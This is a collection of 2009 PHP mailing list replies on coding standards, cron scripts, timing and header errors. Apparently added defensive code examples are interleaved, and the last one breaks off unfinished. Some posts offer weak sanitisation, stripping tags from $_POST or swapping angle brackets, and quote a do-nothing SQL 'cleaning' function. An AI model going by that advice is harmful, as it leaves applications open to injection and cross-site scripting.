Re: [PHP] Proper code formatting
Hi Angus, please, read this topic

http://www.igorescobar.com/blog/2009/02/03/coding-standards/

I speak a little bit about Coding Standards.

Igor Escobar
systems analyst & interface designer
www . igorescobar . com

On Mon, Mar 23, 2009 at 9:48 AM, Jason Pruim wrote:

> George Larson wrote:
>
>> On Mon, Mar 23, 2009 at 8:23 AM, Shawn McKenzie wrote:
>>
>>> Bob McConnell wrote:
>>>
>>>> From: Michael A. Peters
>>>>
>>>>> Angus Mann wrote:
>>>>>
>>>>>> Hi all, I'm fairly new to PHP so I don't have too many bad habits yet.
>>>>>> I'm keen to make my code easy to read for me in the future, and for
>>>>>> others as well.
>>>>>>
>>>>>> Are there any rules or advice I can use for formatting (especially
>>>>>> indenting) code?
>>>>>>
>>>>>> for example how best to format / indent this ?
>>>>>
>>>>> To each his own. Whatever floats your canoe.
>>>>> Just whatever you pick, stick to it throughout your code.
>>>>>
>>>>>> I'm using "PHP designer 2008" which does syntax coloring but if it has
>>>>>> something to automatically indent - I haven't found it yet.
>>>>>
>>>>> It probably allows you to either set a specify a tab as a real tab or a
>>>>> specified number of spaces. Auto-indenting - this isn't python, the
>>>>> compiler doesn't enforce its way, you follow the convention of the
>>>>> project you are working on - so I suspect many php editors tailored to
>>>>> php don't have an auto indent.
>>>>>
>>>>> I've never of course tried that specific product. I use bluefish, vi,
>>>>> and emacs.
>>>>
>>>> To take this question a step further, is there a PHP best practices
>>>> document available? I am looking for one that I can give to a new
>>>> programmer and tell her "do it this way until you can explain to me why
>>>> you shouldn't."
>>>>
>>>> Bob McConnell
>>>
>>> There are various coding standards. There is one for PEAR, the Zend
>>> Framework and most frameworks/large projects that take contributions
>>> have them. Here's Zend:
>>>
>>> http://framework.zend.com/manual/en/coding-standard.html
>>>
>>> --
>>> Thanks!
>>> -Shawn
>>> http://www.spidean.com
>>>
>>> --
>>> PHP General Mailing List (http://www.php.net/)
>>> To unsubscribe, visit: http://www.php.net/unsub.php
>>
>> Being a greenhorn, I too can benefit from this thread.
>>
>> Is that to say, Shawn, that you personally find this (Zend) standard as
>> good or better than the rest?
>
> I actually just went through this with a group of people that come from all
> different levels and backgrounds in regards to programming. Trying to decide
> whether to use spaces, or tabs, short hand or long hand... It took quite a
> bit of discussion before we arrived at an agreement...
>
> It really didn't matter what format we used as long as we stayed consistent
> throughout the file. In other words, if you are going to edit a file and it
> uses spaces instead of tabs, use spaces
>
> So absolutely, develop some standards if you are going to have multiple
> coders working on it... But they don't have to be set by someone else...
>
> Personally though, I go for readability it may at times take longer to
> write it out, but since we all type 500 words permit with 100% accuracy it
> won't be a problem right? ;)
>
> And then when you go back to the code in 6 months, a year, 2 years... It's
> still easily readable :)
Re: [PHP] Re: Multithreading in PHP
Great Project, Lemos.

When you are thinking in show more examples?

Regards,
Igor Escobar
systems analyst & interface designer
www . igorescobar . com

On Fri, Mar 20, 2009 at 3:04 AM, Manuel Lemos wrote:

> Hello Andrea,
>
> on 03/18/2009 06:07 AM Andrea Giammarchi said the following:
> > If anybody interested, this is my "old" comet implementation in PHP:
> > http://webreflection.blogspot.com/2008/04/phomet-changes-name-so-welcome-phico.html
>
> Great! Any live examples page?
>
> > P.S. Hi Manuel, ages I do not read you ( ages I do not post my classes in
> > phpclasses.org :-) )
>
> Oh, yes, feel free to get back. Hopefully soon the PHPClasses site will
> share ad revenue with the best contributors! ;-)
>
> --
> Regards,
> Manuel Lemos
>
> Find and post PHP jobs
> http://www.phpclasses.org/jobs/
>
> PHP Classes - Free ready to use OOP components written in PHP
> http://www.phpclasses.org/
Re: [PHP] today i found the best function I've ever seen
Do not try this at home...

Igor Escobar
systems analyst & interface designer
www . igorescobar . com

On Sat, Mar 21, 2009 at 7:23 AM, Virgilio Quilario <virgilio.quila...@gmail.com> wrote:

> > if( !function_exists('clean_sql_term') )
> > {
> >     function clean_sql_term($term) {
> >         return $term;
> >     }
> > }
> >
> > beautiful
>
> hi Nathan,
>
> Nice find.
> You have found a very useful function.
> Here is how I use it to load needed PHP files that declares the function.
> if (!function_exists('clean_sql_term'))
> {
>     require 'module.php';
> }
> clean_sql_term($term);
>
> Above code makes sure that the function is available.
> Really beautiful, though jurassic but useful.
>
> Cheers,
> Virgil
> http://www.jampmark.com
Re: [PHP] So called "PHP Expert"
Say this:

"Okey man, where are the camera? it's not funny :D"

Regards,
Igor Escobar
systems analyst & interface designer
www . igorescobar . com

On Sat, Mar 21, 2009 at 8:16 PM, abdulazeez alugo wrote:

> > Date: Sat, 21 Mar 2009 10:54:56 -0400
> > From: danbr...@php.net
> > To: tedd.sperl...@gmail.com
> > CC: php-general@lists.php.net; rob...@interjinn.com
> > Subject: Re: [PHP] So called "PHP Expert"
> >
> > On Sat, Mar 21, 2009 at 10:48, tedd wrote:
> > >
> > > Leave it to you to drop kick me when you have the chance. Here I was trying
> > > to say something prophetic and you made it pathetic. :-)
> >
> > Maybe philosophical?
> >
> > > Oh well, at least I take comfort in the fact that you'll probably not live
> > > to be as old as me. But if you do, just imagine how deep your ignorance will
> > > be. :-)
> >
> > Now *this* is prophetic and a harsh response to a virtual
> > drop-kick. You guys play rough!
>
> Oh! ref dan, I charge you to give them a yellow card or something.
>
> Alugo
> www.frangeovic.com
Re: [PHP] Proper code formatting
I'm brazilian, and i understand your language, why you don't understand my ?

Regards,
Igor Escobar
systems analyst & interface designer
www . igorescobar . com

On Mon, Mar 23, 2009 at 11:10 AM, abdulazeez alugo wrote:

> > Date: Mon, 23 Mar 2009 09:52:21 -0300
> > From: titiolin...@gmail.com
> > To: pru...@gmail.com
> > CC: george.g.lar...@gmail.com; nos...@mckenzies.net; php-general@lists.php.net
> > Subject: Re: [PHP] Proper code formatting
> >
> > Hi Angus, please, read this topic
> >
> > http://www.igorescobar.com/blog/2009/02/03/coding-standards/
> >
> > I speak a little bit about Coding Standards.
>
> And how did you expect us to understand the language your site is written in?
Re: [PHP] Proper code formatting
Ok man, I'm sorry.

This post i wrote in a few days ago in my native language. I don't have time enough to write in two languages but who knows in the future i can do it?

I'm sorry about that man, but if you like the post anyway, try something like google translator.

Regards,
Igor Escobar
systems analyst & interface designer
www . igorescobar . com

On Mon, Mar 23, 2009 at 11:33 AM, abdulazeez alugo wrote:

> > I'm brazilian, and i understand your language, why you don't understand my ?
> >
> > Regards,
> > Igor Escobar
> > systems analyst & interface designer
> > www . igorescobar . com
>
> Well I guess the answer to that is obvious. I'm not brazilian and it would
> be so generous of you to use the most acceptable International language in
> the world (English). Though it's not my first language too but I use it as
> a mean to communicate with others. At least the essence of communication is
> to be understood isn't it?
>
> NOTE: I speak other international languages too though but I haven't come
> up to learning brazilian. Maybe you can help me with a simple tutorial on
> your language.
>
> Best regards.
>
> Alugo.
Re: [PHP] Proper code formatting
Thx ab.

I'm did not to be rude ;)

Have a nice day.

Regards,
Igor Escobar
systems analyst & interface designer
www . igorescobar . com

On Mon, Mar 23, 2009 at 12:05 PM, abdulazeez alugo wrote:

> > Ok man, I'm sorry.
> >
> > This post i wrote in a few days ago in my native language. I don't have time
> > enough to write in two languages but who knows in the future i can do it?
> >
> > I'm sorry about that man, but if you like the post anyway, try something
> > like google translator.
> >
> > Regards,
> > Igor Escobar
> > systems analyst & interface designer
> > www . igorescobar . com
>
> Well. Since it's not a common thing on this mailing list to hear someone
> say he's sorry I readily accept your apology and I'll use the google
> translator as you suggested. Come to think of it, arguments almost never end
> well on this list (we just broke the record). Remember the one between
> Almighty, self acclaimed Superstar Dan and Bot Jessica? then there was the
> one between the client who later became the employer and Tedd.
>
> Cheers.
Re: [PHP] Problems with implode
Maybe you can reduce your code a little using the range(); it's just a suggestion...

Regards,
Igor Escobar
systems analyst & interface designer
www . igorescobar . com

On Wed, Mar 25, 2009 at 4:42 AM, Toke Herkild wrote:

> Okay, tested in the following manner:
>
> for ($i=12300;$i<12801;$i++){
>     // List is filled with integers, in the correct charset from PHP
>     $list[] = $i;
> }
> $pidList = implode(',', $list);
> mail('y...@email.dom', 'debug implode', var_export(array($pidList, $list),1));
>
> And I got the same error, which indicates that perhaps implode works just
> as it should but the representation is off. that in itself would be okay,
> but how then do we control that the query is actually correct ?
> If we cannot trust the debug output how then can we trust that the query
> is doing what it is supposed to do ?
>
> Regards,
> Toke
>
> Toke Herkild wrote:
>
>> As stated before, packet size not the problem, data is delivered perfectly
>> from MySQL.
>> Problem seems to be when the result string is displayed.
>> I'll try to do a test with a numeric array:
>> $list = array(12300..12800); and see what happens.
>>
>> regards,
>> Toke
>>
>> Andrea Giammarchi wrote:
>>
>>> What about MySQL max_allowed_packet setting? is it bigger than produced
>>> string?
>>>
>>>> To: php-general@lists.php.net
>>>> Date: Tue, 24 Mar 2009 15:23:20 +0100
>>>> From: t...@ezl-data.dk
>>>> Subject: Re: [PHP] Problems with implode
>>>>
>>>> Per Jessen wrote:
>>>>
>>>>> Andrea Giammarchi wrote:
>>>>>
>>>>>> Dunno why you guys started talk about utf-8 problems, he has a list of
>>>>>> ids which should contain only unsigned integers, otherwise I do not
>>>>>> get how that query could work with an implode(',', $whatever)
>>>>>
>>>>> Very good point - maybe the OP has not yet tested his code that far? Is
>>>>> there a possibility that some of the id's are _not_ just plain integers
>>>>> made up of 0-9?
>>>>>
>>>>> /Per
>>>>
>>>> And exactly the reason I tried the following:
>>>> $list[] = $row['uid'];
>>>> $list[] = intval($row['uid']);
>>>> $list[] = mb_convert_encoding($row['uid'], 'iso-8859-1');
>>>> $list[] = mb_convert_encoding(intval($row['uid']), 'iso-8859-1');
>>>>
>>>> My best bet as for now:
>>>> It isn't implode there's the problem, but the length of the string
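
The id list joined with implode(',', $list) in this thread, and the pass-through clean_sql_term() quoted in the earlier "best function" thread, both concern how values reach the SQL text. The following is an added example, not code from either thread: it checks that ids are plain 0-9 integers and binds every value as a parameter. The pages table, its columns and the function names are hypothetical, and it uses an in-memory SQLite database through PDO (pdo_sqlite assumed) instead of the MySQL server the thread mentions.

```php
<?php
declare(strict_types=1);

// Added example, not code from the thread. The pages table, its columns and
// the function names are hypothetical; all data is constructed.
// Needs the pdo_sqlite extension; runs against an in-memory database.

/** Keep only values that are plain unsigned integers made up of 0-9. */
function unsigned_ids(array $raw): array
{
    $ids = [];
    foreach ($raw as $value) {
        $s = is_int($value) ? (string) $value : (is_string($value) ? $value : '');
        // ctype_digit() rejects '', '-5', '1e3', '12 301' and '12301x';
        // the length cap keeps the cast below PHP_INT_MAX on 64-bit builds.
        if ($s !== '' && strlen($s) <= 18 && ctype_digit($s)) {
            $ids[(int) $s] = (int) $s;   // keyed by value, so duplicates collapse
        }
    }
    ksort($ids);
    return array_values($ids);
}

/** Select rows for an id list: one bound placeholder per id, in chunks. */
function fetch_by_ids(PDO $db, array $rawIds, int $chunkSize = 500): array
{
    $rows = [];
    foreach (array_chunk(unsigned_ids($rawIds), $chunkSize) as $chunk) {
        $marks = implode(',', array_fill(0, count($chunk), '?'));
        $stmt  = $db->prepare("SELECT uid, title FROM pages WHERE uid IN ($marks) ORDER BY uid");
        foreach ($chunk as $i => $id) {
            $stmt->bindValue($i + 1, $id, PDO::PARAM_INT);
        }
        $stmt->execute();
        foreach ($stmt->fetchAll(PDO::FETCH_ASSOC) as $row) {
            $rows[] = $row;
        }
    }
    return $rows;   // an empty or fully rejected list yields [] without querying
}

/** Substring search on title; the term is bound and LIKE wildcards are escaped. */
function search_title(PDO $db, string $term): array
{
    // "!" is the escape character, so "%" and "_" in the term match literally.
    $literal = strtr($term, ['!' => '!!', '%' => '!%', '_' => '!_']);
    $stmt = $db->prepare("SELECT uid, title FROM pages WHERE title LIKE ? ESCAPE '!' ORDER BY uid");
    $stmt->execute(['%' . $literal . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pages (uid INTEGER PRIMARY KEY, title TEXT NOT NULL)');
$insert = $db->prepare('INSERT INTO pages (uid, title) VALUES (?, ?)');
foreach ([[12300, "O'Brien's notes"], [12301, '100% cotton'], [12302, '100 percent']] as $row) {
    $insert->execute($row);
}

// Constructed id list: valid ids mixed with values that are not plain 0-9 integers.
$rawIds = ['12300', 12302, '12301x', '-5', '1e3', '', '12300'];
echo 'accepted ids: ', implode(',', unsigned_ids($rawIds)), "\n";
foreach (fetch_by_ids($db, $rawIds) as $row) {
    echo $row['uid'], ' ', $row['title'], "\n";
}

// A quote in the term needs no cleaning function once the value is bound.
foreach (["O'Brien", '100%'] as $term) {
    $titles = array_column(search_title($db, $term), 'title');
    echo $term, ' => ', implode(' | ', $titles), "\n";
}
```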
Re: [PHP] Fwd: A fatal error with php virtual cron
Maybe your problem are in the way you're calling your program by socket.

If you show me this part of the code, maybe i can help you.

Regards,
Igor Escobar
systems analyst & interface designer
www . igorescobar . com

On Wed, Mar 25, 2009 at 4:01 PM, אלמוג בקו wrote:

> Hello,
> There is some week than I trying to solve a critical error on my VirtualCron
> script.
>
> *First of all what is VirtualCron?:*
> Virtual cron is script that's call(http request) himself and doing the
> "jobs" by the time(like a cron-jobs on linux, but this script build on php
> and its make it independent by the Operation System and the access to the
> server. [wordpress build something like that too]).
>
> *How my system works?:*
> I have a page(cron.php) and I set this settings:
>
> ignore_user_abort(true);
> set_time_limit(0);
> sleep(1); //setting the base time unit
>
> I call to the script by socket connection with timeout of 0.5s and with
> non-blocking mode.
>
> Additionally I have a log system that save a file with the error when they
> happened. and I can "kill" the script by deleting "pid" file.
>
> *Well what's happened?:*
> The script works well when I tune a job to work more 5min from the running
> time.
> But from some reason the script stop to run after some seconds.. and the
> system's log doesn't show any php's error.
>
> BUT I found this error on my apache's logs:
> [Wed Mar 25 10:25:19 2009] [error] [client 67.205.44.109] Premature end of script headers: cron.php
>
> I hope thats someone know what I have to do..
> Thanks a lot,
> Almog Baku, Israel.
>
> *** My script run on Shared DreamHost, with php5 & apache on linux ***
>
> Contact me: <http://www.facebook.com/profile.php?id=682327963>
Re: [PHP] Fwd: A fatal error with php virtual cron
Try the ignore_user_abort(true);

Regards,
Igor Escobar
systems analyst & interface designer
www . igorescobar . com

On Wed, Mar 25, 2009 at 4:21 PM, אלמוג בקו wrote:

> This is a part of the class:
>
> private function _request() {
>     //URL information
>     $url = "http://".$_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'];
>     $url_info = parse_url($url);
>
>     //Fixing port
>     if(!isset($url_info['port'])) $url_info['port']=80;
>
>     //Send "Cron-data"
>     $data = array(
>         'jobs'=> base64_encode(var_export($this->jobs, true)),
>         'firstRun'=> base64_encode($this->firstRun)
>     );
>     $data=http_build_query($data);
>
>     //Headers
>     $headers = ""
>         ."POST " . $url . " HTTP/1.0 \r\n"
>         ."HOST: " . $url_info['host'] . ":" . $url_info['port'] . " \r\n"
>         ."Content-type: application/x-www-form-urlencoded \r\n"
>         ."Content-Length: " . strlen($data) . " \r\n"
>         ."User-Agent: phpCron \r\n"
>         ."Connection: close\r\n\r\n"
>         .$data
>     ;
>
>     //Error vars
>     $errstr= null;
>     $errno = null;
>
>     $fp = fsockopen($_SERVER['HTTP_HOST'], $_SERVER['SERVER_PORT'], $errno, $errstr, 0.5);
>     if($fp) {
>         @fwrite($fp, $headers);
>         @stream_set_timeout($fp, 0.5);
>         @stream_set_blocking($fp, 0);
>         @fclose($fp);
>         return true;
>     } else {
>         $this->error = array('socket'=>array('errstr'=>$errstr, 'errno'=>$errno));
>         return false;
>     }
> }
>
> Contact me: <http://www.facebook.com/profile.php?id=682327963>
>
> On Wed, Mar 25, 2009 at 9:17 PM, Igor Escobar wrote:
>
>> Maybe your problem are in the way you're calling your program by socket.
>>
>> If you show me this part of the code, maybe i can help you.
>>
>> Regards,
>> Igor Escobar
>> systems analyst & interface designer
>> www . igorescobar . com
>>
>> On Wed, Mar 25, 2009 at 4:01 PM, אלמוג בקו wrote:
>>
>>> Hello,
>>> There is some week than I trying to solve a critical error on my
>>> VirtualCron script.
>>>
>>> *First of all what is VirtualCron?:*
>>> Virtual cron is script that's call(http request) himself and doing the
>>> "jobs" by the time(like a cron-jobs on linux, but this script build on php
>>> and its make it independent by the Operation System and the access to the
>>> server. [wordpress build something like that too]).
>>>
>>> *How my system works?:*
>>> I have a page(cron.php) and I set this settings:
>>>
>>> ignore_user_abort(true);
>>> set_time_limit(0);
>>> sleep(1); //setting the base time unit
>>>
>>> I call to the script by socket connection with timeout of 0.5s and with
>>> non-blocking mode.
>>>
>>> Additionally I have a log system that save a file with the error when they
>>> happened. and I can "kill" the script by deleting "pid" file.
>>>
>>> *Well what's happened?:*
>>> The script works well when I tune a job to work more 5min from the
>>> running time.
>>> But from some reason the script stop to run after some seconds.. and the
>>> system's log doesn't show any php's error.
>>>
>>> BUT I found this error on my apache's logs:
>>> [Wed Mar 25 10:25:19 2009] [error] [client 67.205.44.109] Premature end of script headers: cron.php
>>>
>>> I hope thats someone know what I have to do..
>>> Thanks a lot,
>>> Almog Baku, Israel.
>>>
>>> *** My script run on Shared DreamHost, with php5 & apache on linux ***
>>>
>>> Contact me: <http://www.facebook.com/profile.php?id=682327963>
Re: [PHP] Fwd: A fatal error with php virtual cron
Oh, Sorry, I had not seen.

Well, I don't see anything wrong in your code, but maybe...if you find in your apache config file, you can found for something similar to your problem ...

Sorry can't help you.

Regards,
Igor Escobar
systems analyst & interface designer
www . igorescobar . com

On Wed, Mar 25, 2009 at 4:40 PM, אלמוג בקו wrote:

> I already wrote that..
>
> ignore_user_abort(true);
> set_time_limit(0);
> sleep(1);
>
> Contact me: <http://www.facebook.com/profile.php?id=682327963>
>
> On Wed, Mar 25, 2009 at 9:38 PM, Igor Escobar wrote:
>
>> Try the ignore_user_abort(true);
>>
>> Regards,
>> Igor Escobar
>> systems analyst & interface designer
>> www . igorescobar . com
>>
>> On Wed, Mar 25, 2009 at 4:21 PM, אלמוג בקו wrote:
>>
>>> This is a part of the class:
>>>
>>> private function _request() {
>>>     //URL information
>>>     $url = "http://".$_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'];
>>>     $url_info = parse_url($url);
>>>
>>>     //Fixing port
>>>     if(!isset($url_info['port'])) $url_info['port']=80;
>>>
>>>     //Send "Cron-data"
>>>     $data = array(
>>>         'jobs'=> base64_encode(var_export($this->jobs, true)),
>>>         'firstRun'=> base64_encode($this->firstRun)
>>>     );
>>>     $data=http_build_query($data);
>>>
>>>     //Headers
>>>     $headers = ""
>>>         ."POST " . $url . " HTTP/1.0 \r\n"
>>>         ."HOST: " . $url_info['host'] . ":" . $url_info['port'] . " \r\n"
>>>         ."Content-type: application/x-www-form-urlencoded \r\n"
>>>         ."Content-Length: " . strlen($data) . " \r\n"
>>>         ."User-Agent: phpCron \r\n"
>>>         ."Connection: close\r\n\r\n"
>>>         .$data
>>>     ;
>>>
>>>     //Error vars
>>>     $errstr= null;
>>>     $errno = null;
>>>
>>>     $fp = fsockopen($_SERVER['HTTP_HOST'], $_SERVER['SERVER_PORT'], $errno, $errstr, 0.5);
>>>     if($fp) {
>>>         @fwrite($fp, $headers);
>>>         @stream_set_timeout($fp, 0.5);
>>>         @stream_set_blocking($fp, 0);
>>>         @fclose($fp);
>>>         return true;
>>>     } else {
>>>         $this->error = array('socket'=>array('errstr'=>$errstr, 'errno'=>$errno));
>>>         return false;
>>>     }
>>> }
>>>
>>> Contact me: <http://www.facebook.com/profile.php?id=682327963>
>>>
>>> On Wed, Mar 25, 2009 at 9:17 PM, Igor Escobar wrote:
>>>
>>>> Maybe your problem are in the way you're calling your program by socket.
>>>>
>>>> If you show me this part of the code, maybe i can help you.
>>>>
>>>> Regards,
>>>> Igor Escobar
>>>> systems analyst & interface designer
>>>> www . igorescobar . com
>>>>
>>>> On Wed, Mar 25, 2009 at 4:01 PM, אלמוג בקו wrote:
>>>>
>>>>> Hello,
>>>>> There is some week than I trying to solve a critical error on my
>>>>> VirtualCron script.
>>>>>
>>>>> *First of all what is VirtualCron?:*
>>>>> Virtual cron is script that's call(http request) himself and doing the
>>>>> "jobs" by the time(like a cron-jobs on linux, but this script build on
>>>>> php and its make it independent by the Operation System and the access
>>>>> to the server. [wordpress build something like that too]).
>>>>>
>>>>> *How my system works?:*
>>>>> I have a page(cron.php) and I set this settings:
>>>>>
>>>>> ignore_user_abort(true);
>>>>> set_time_limit(0);
>>>>> sleep(1); //setting the base time unit
>>>>>
>>>>> I call to the script by socket connection with timeout of 0.5s and with
>>>>> non-blocking mode.
>>>>>
>>>>> Additionally I have a log system that save a file with the error when
>>>>> they happened. and I can "kill" the script by deleting "pid" file.
>>>>>
>>>>> *Well what's happened?:*
>>>>> The script works well when I tune a job to work more 5min from the
>>>>> running time.
>>>>> But from some reason the script stop to run after some seconds.. and
>>>>> the system's log doesn't show any php's error.
>>>>>
>>>>> BUT I found this error on my apache's logs:
>>>>> [Wed Mar 25 10:25:19 2009] [error] [client 67.205.44.109] Premature end of script headers: cron.php
>>>>>
>>>>> I hope thats someone know what I have to do..
>>>>> Thanks a lot,
>>>>> Almog Baku, Israel.
>>>>>
>>>>> *** My script run on Shared DreamHost, with php5 & apache on linux ***
>>>>>
>>>>> Contact me: <http://www.facebook.com/profile.php?id=682327963>
Re: [PHP] time() TIMER in seconds or just numbers
When someone does that, it means the execution time between $t1 and $t2...

Regards,
Igor Escobar
systems analyst & interface designer
www . igorescobar . com

On Mon, Mar 30, 2009 at 7:38 AM, Richard Heyes wrote:

> 2009/3/30 Andrew Williams :
> > what does time();
> >
> > $t1 = time();
> >
> > {
> >
> > do something
> > }
> > $t2 = time();
> >
> > $end_time = $t2 - $t1;
> > echo $end_time;
> >
> > what does $end_time represent?
>
> $end_time is not a great name for it: it's the time (number of
> seconds) it took to go from $t1 to $t2. $duration might be better.
>
> > how do you determine the next 5 mins?
>
> Eh? time() + 300 is five minutes from now.
>
> --
> Richard Heyes
>
> HTML5 Canvas graphing for Firefox, Chrome, Opera and Safari:
> http://www.rgraph.net (Updated March 14th)
Re: [PHP] foreach and form submission.
Try this...

$_POST = array_map('strip_tags', $_POST);

Igor Escobar
systems analyst & interface designer
www . igorescobar . com

On Sat, Mar 28, 2009 at 6:21 PM, Angus Mann wrote:

> Thanks Ashley...that did the trick.
> After reading about the limitations of strip_tags I decided to just replace
> the bad bits as below...
> It still uses your "foreach" suggestion but replaces "<" and ">" with "("
> and ")" instead of stripping tags.
>
> I think I will extend the good and bad arrays to deal with magic quotes
> also !
>
> $bad = array('<','<','<', '>', '>', '>');
> $good = array('(', '(', '(', ')', ')', ')');
> foreach ($_POST as $key => $value) {
>     $_POST[$key] = str_ireplace($bad, $good, $value);
> }
>
>> I'd do something like this, so as to preserve the original post data
>> array:
>>
>> $data = Array();
>> foreach($_POST as $key => $value)
>> {
>>     $data[$key] = strip_tags($value);
>> }
>>
>> Note that strip_tags() will not be able to decently clean up messy code
>> (i.e. code where the opening or closing tags themselves aren't formed
>> properly)
>>
>> Ash
>> www.ashleysheridan.co.uk
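
The thread above rewrites $_POST on the way in, either with strip_tags() or by swapping angle brackets for parentheses. As an added example (not code from any of the posters), the sketch below keeps the submitted data unchanged and encodes it with htmlspecialchars() at the point of output, and prints the strip_tags() result beside it for comparison. The function names are hypothetical and $post is a constructed stand-in for $_POST.

```php
<?php
declare(strict_types=1);

// Added example, not code from the thread. Function names are hypothetical
// and $post is a constructed stand-in for $_POST.

/** Encode a value for HTML output; nested arrays (name="filters[x]") are walked. */
function html_encode($value)
{
    if (is_array($value)) {
        return array_map('html_encode', $value);
    }
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * strip_tags() applied to the same structure, for comparison only.
 * A plain array_map('strip_tags', $_POST) cannot do this: strip_tags()
 * expects a string, so a nested array field raises a TypeError on PHP 8.
 */
function strip_tags_deep($value)
{
    return is_array($value)
        ? array_map('strip_tags_deep', $value)
        : strip_tags((string) $value);
}

// Constructed input: ordinary text with an ampersand, quotes, a tag and a
// comparison written with "<", plus one nested array field.
$post = [
    'comment' => 'Tom & "Jerry" said <b>hi</b> (x<y)',
    'filters' => ['calling_url' => 'list.php?a=1&b="two"'],
];

$stripped = strip_tags_deep($post);
$encoded  = html_encode($post);   // $post itself stays untouched for storage

// Attribute context: strip_tags() leaves the double quotes in place, so the
// value attribute ends early; the encoded form keeps the whole value intact.
printf("stripped: <input name=\"filters[calling_url]\" value=\"%s\">\n",
    $stripped['filters']['calling_url']);
printf("encoded:  <input name=\"filters[calling_url]\" value=\"%s\">\n",
    $encoded['filters']['calling_url']);

// Element context: strip_tags() changes what the user wrote (the PHP manual
// warns that partial tags can remove more text than expected), while the
// encoded form displays the original characters.
printf("stripped: <p>%s</p>\n", $stripped['comment']);
printf("encoded:  <p>%s</p>\n", $encoded['comment']);
```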
Re: [PHP] Security Support
I agree with you Daniel

Regards,
Igor Escobar
systems analyst & interface designer
www . igorescobar . com

On Mon, Mar 30, 2009 at 10:58 AM, Daniel Brown wrote:

> On Sun, Mar 29, 2009 at 22:07, abdulazeez alugo wrote:
> >> Yea, dude, well me GED says I kin git it dun wit less wastid time.
> >>
> >> --
> > No be only una get pidgin English ooo. Me sef fit do am sharp sharp no be
> > say them say.
>
> Is there any particular reason you guys totally trashed this
> thread? It's fine if you don't want to apply, but please don't go out
> of your way to try to make someone with a legitimate and
> properly-formatted request look like a moron because it backfires
> and reflects poorly on your own professionalism.
>
> --
> daniel.br...@parasane.net || danbr...@php.net
> http://www.parasane.net/ || http://www.pilotpig.net/
Re: [PHP] time() TIMER in seconds or just numbers
Okay, but you understand the purpose of it?

Igor Escobar
systems analyst & interface designer
www . igorescobar . com

On Mon, Mar 30, 2009 at 3:42 PM, haliphax wrote:

> On Mon, Mar 30, 2009 at 11:37 AM, Igor Escobar wrote:
> > The people use that to measure performance.
> >
> > If you're interested about that read
> > http://www.igorescobar.com/blog/2009/03/05/benchmarking-de-desempenho-no-php/
> > (in portuguese, sorry)
> >
> > Regards,
> > Igor Escobar
> >
> > On Mon, Mar 30, 2009 at 1:05 PM, haliphax wrote:
> >>
> >> On Mon, Mar 30, 2009 at 10:47 AM, Richard Heyes wrote:
> >> >> When someone does that, it means the execution time between $t1 and
> >> >> $t2...
> >> >
> >> > Is that for my benefit? Believe it or not, I do know the arcane art of
> >> > subtraction...
> >>
> >> I would subtract more often, but sacrificial farm animals and black
> >> candles are so hard to come by these days...
>
> Oh, I'm fully aware of what it's for. FYI, microtime() is probably
> more appropriate, since 1 full second in computer terms is a loong
> time.
>
> ...and I don't speak a lick of Portuguese.
>
> --
> // Todd
[PHP] Problem with header();
Hi guys, probably everybody goes think: "its the same problem ever" HTML before header() functions ... but it is not.

I has working on a project and this are a running in "Windows" (shame on me).
Recently i migrate to Ubuntu and some problems occurred and that specifically i can't understand WHY this happening

"Warning: Cannot modify header information - headers already sent by"

On my web server on the internet it's OK
On my local web server on my work it's OK
On my local web server on my notebook it's the problem.

This error occurs only in my notebook (recently that I migrate to linux and it does not already).

Please, someone have any idea what the fuck is happening?

Regards,
Igor Escobar
systems analyst & interface designer
www . igorescobar . com
Re: [PHP] Problem with header();
I don't had the opportunity to test it yet, but today i will.

Today i will make two tests:

- Save the files without BOM.
- If i don't have success i will disable the output buffering.

Thanks to everybody for all support.

Regards,
Igor Escobar
systems analyst & interface designer
www . igorescobar . com

On Tue, Mar 31, 2009 at 12:39 AM, Phpster wrote:

> Output buffering turned off?
>
> Bastien
>
> Sent from my iPod
>
> On Mar 30, 2009, at 15:03, Igor Escobar wrote:
>
>> Hi guys, probably everybody goes think: "its the same problem ever" HTML
>> before header() functions ... but it is not.
>>
>> I has working on a project and this are a running in "Windows" (shame on
>> me).
>> Recently i migrate to Ubuntu and some problems occurred and that
>> specifically i can't understand WHY this happening
>>
>> "Warning: Cannot modify header information - headers already sent by"
>>
>> On my web server on the internet it's OK
>> On my local web server on my work it's OK
>> On my local web server on my notebook it's the problem.
>>
>> This error occurs only in my notebook (recently that I migrate to linux
>> and it does not already).
>>
>> Please, someone have any idea what the fuck is happening?
>>
>> Regards,
>> Igor Escobar
>> systems analyst & interface designer
>> www . igorescobar . com
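
For the first of the two tests listed in this message, the following added example (not code from the thread) scans PHP source for bytes that are emitted before any header() call: a UTF-8 byte order mark, content ahead of the opening tag, or blank space after the final closing tag. The function names are hypothetical, the trailing-tag check is a heuristic, and the sample files are constructed in a temporary directory.

```php
<?php
declare(strict_types=1);

// Added example, not code from the thread. Function names are hypothetical;
// the sample files are constructed in a temporary directory.

/** Return the reasons a PHP source file would send output before header(). */
function early_output_reasons(string $source): array
{
    $reasons = [];
    if (strncmp($source, "\xEF\xBB\xBF", 3) === 0) {
        $reasons[] = 'UTF-8 BOM';
        $source = substr($source, 3);
    }
    if (!preg_match('/^<\?/', $source)) {
        $reasons[] = 'content before the opening tag';
    }
    // Heuristic: look at what follows the last closing tag. PHP swallows a
    // single newline directly after it; any further whitespace is output.
    $pos = strrpos($source, '?' . '>');
    if ($pos !== false) {
        $tail = preg_replace('/^\r?\n/', '', substr($source, $pos + 2), 1);
        if ($tail !== '' && trim($tail) === '') {
            $reasons[] = 'whitespace after the final closing tag';
        }
    }
    return $reasons;
}

/** Walk a directory tree and report every .php file with a finding. */
function scan_tree(string $dir): array
{
    $found = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if ($file->isFile() && strtolower($file->getExtension()) === 'php') {
            $reasons = early_output_reasons((string) file_get_contents($file->getPathname()));
            if ($reasons !== []) {
                $found[$file->getPathname()] = $reasons;
            }
        }
    }
    ksort($found);
    return $found;
}

// Constructed sample tree: one clean file, one saved with a BOM, one with
// blank lines after its closing tag.
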